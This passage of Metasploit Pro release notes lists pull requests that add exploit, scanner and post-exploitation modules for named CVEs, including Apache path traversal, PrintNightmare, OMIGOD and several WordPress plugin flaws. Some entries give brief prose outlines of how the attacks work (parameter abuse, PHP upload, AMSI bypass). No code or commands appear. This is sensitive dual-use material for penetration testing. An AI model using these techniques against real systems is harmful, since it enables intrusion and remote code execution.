PR 16399 - A new module has been added that exploits CVE-2022-28381, a remotely exploitable SEH buffer overflow vulnerability in AllMediaServer version 1.6 and prior. Successful exploitation results in remote code execution as the user running AllMediaServer.
PR 16401 - This change adds support for CVE-2022-22616 to the existing Gatekeeper bypass exploit module which reportedly covers macOS Catalina all the way to MacOS Monterey versions below 12.3. Since this now targets two CVEs, we've introduced a new CVE option to select which CVE to exploit. The default is the most recent CVE.

New in Metasploit Pro 4.20.0 November 10 (Nov 11, 2021)

Improved:
PR 15665 - This adds additional metadata to exploit modules to specify Meterpreter command requirements. Metadata information is used to add a descriptive warning when running modules with a Meterpreter implementation that doesn't support the required command functionality.
PR 15681 - This adds support for reverse port forwarding via established SSH sessions.
PR 15778 - This adds documentation for the http trace scanner.
PR 15782 - This updates the iis_internal_ip module to include coverage for the PROPFIND internal IP address disclosure as described by CVE-2002-0422.
PR 15788 - When a generated Powershell command payload exceeds the maximum length allowed to successfully execute, it will now gracefully fall back to omitting an AMSI bypass.
PR 15803 - This adds f5_bigip_virtual_server scanner documentation.
Fixed:
Pro: Scheduled tasks will now report accurate next start times for different user timezones.
PR 15799 - This fixes a crash in the iis_internal_ip module.
PR 15805 - This bumps the metasploit-payloads version to include two bug fixes for the Python Meterpreter.
Modules:
PR 15558 - This adds a post module that allows the user to view the Meterpreter sessions filesystem via a locally hosted web page.
PR 15754 - This adds a scanner and exploit module for the two recent path traversal vulnerabilities in the apache2 HTTP server. The RCE module requires mod_cgi to be enabled and can be exploited remotely without any authentication. These vulnerabilities are identified as CVE-2021-41773 and CVE-2021-42013.
PR 15756 - This adds a module that leverages CVE-2021-31806 and CVE-2021-31807 to trigger a denial of service condition in vulnerable Squid proxy servers.
PR 15761 - This exploits an authentication bypass which leads to arbitrary code execution in versions3.7.1.4 and below of the Wordpress plugin, pie-register. Supplying a valid admin ID to the user_id_social_site parameter in a POST request returns a valid session cookie. Using that session cookie a PHP payload is uploaded as a plugin then requested, resulting in code execution.
PR 15765 - This adds an auxiliary module that leverages an information disclosure vulnerability in the BulletproofSecurity plugin for Wordpress. This vulnerability is identified as CVE-2021-39327. The module retrieves a publicly accessible backup file and extracts user credentials from the database backup.
PR 15783 - This adds an exploit for CVE-2020-25223. CVE-2020-25223 is an unauthenticated RCE within the Sophos UTM WebAdmin service. Exploitation of CVE-2020-25223 results in OS command execution as the root user.
PR 15800 - This adds a remote exploit for Microsoft OMI "OMIGOD" CVE-2021-38647.
PR 15816 - This adds an exploit for an unauthenticated remote command injection in GitLab via a separate vulnerability within ExifTool. These vulnerabilities are identified as CVE-2021-22204 and CVE-2021-22205.

New in Metasploit Pro 4.19.1 July 08 (Aug 4, 2021)

Improved:
PR 15358 - This updates the exploit/multi/ssh/sshexec module to now account for cases where the target system does not have the python binary. Using the new binary_exists() class method in lib/msf/base/sessions/command_shell.rb, the module now checks for and uses the valid Python binary found on the target system despite not having a fully-established session.
PR 15363 - Enhances the auxiliary/scanner/ipmi/ipmi_dumphashes module to have SESSION_RETRY_DELAY and SESSION_MAX_ATTEMPTS options
PR 15366 - This updates how the msfconsole's history file is handled. It adds a size limitation so the number of commands does not grow indefinitely and fixes a locking condition that would occur when the history file had grown exceptionally large (~400,000 lines or more).
Fixed:
Pro: We have updated the logo on default Social Engineering redirect template with the latest public location.
PR 15320 - A bug has been fixed in the read_file method of lib/msf/core/post/file.rb that prevented PowerShell sessions from being able to use the read_file() method. PowerShell sessions should now be able to use this method to read files from the target system.
PR 15350 - Fixes a regression issue in the windows/manage/shellcode_inject module which crashed due to a missing mixin
PR 15352 - Fixes an issue where running msfdb init on an already initialised database would generate a new password instead of just starting the database
PR 15371 - This fixes an issue in the apport_abrt_chroot_priv_esc module where if the apport-cli binary was not in the PATH the check method would fail.
Modules:
PR 15107 - This adds an exploit for CVE-2019-5736 which is a flaw in Docker that can be leveraged by an attacker to overwrite the runc binary in the host and escape from a container.
PR 15282 - This adds a module that leverages CVE-2019-15975 which is an authentication bypass in Cisco's DCNM platform. The module will leverage the vulnerability to add a new administrative user account with known credentials that can be used to access the system.
PR 15318 - This post module allows an attacker to perform a privilege escalation on a machine running a vulnerable version of NSClient++. The module retrieves the admin password from a config file at a customizable path, and so long as NSClient++ has both the web interface and ExternalScriptsfeature enabled, gains a SYSTEM shell.
PR 15333 - This adds an exploit module targeting a file upload vulnerability within the Cisco Hyperflex application that can be used to obtain unauthenticated remote code execution.
PR 15341 - This adds an exploit module that targets versions >= v7.0.0 and <= v7.0.4 of the Wordpress plugin, wpDiscuz. An unauthenticated user has the ability to upload arbitrary files as image attachments through the wpDiscuz plugin due to the PHP functions used to process the attachments. Once uploaded, unauthenticated code execution is achieved by requesting the path of the file uploaded.
PR 15349 - This adds an exploit module for rConfig versions <= 3.9.6. An arbitrary file upload vulnerability exists in lib/crud/vendors.crud.php through the vendorLogo parameter. The functionality for uploading vendor logos does not validate the contents of uploaded files, so an authenticated user has the capability of uploading arbitrary php code. Once uploaded, code execution on the server can be achieved by requesting the uploaded php file in the images/vendor path.
PR 15385 - A new module has been added to Metasploit to exploit PrintNightmare, aka CVE-2021-1675/CVE-2021-34527, a Remote Code Execution vulnerability in the Print Spooler service of Windows. Successful exploitation results in the ability to load and execute an attacker controlled DLL as the SYSTEM user.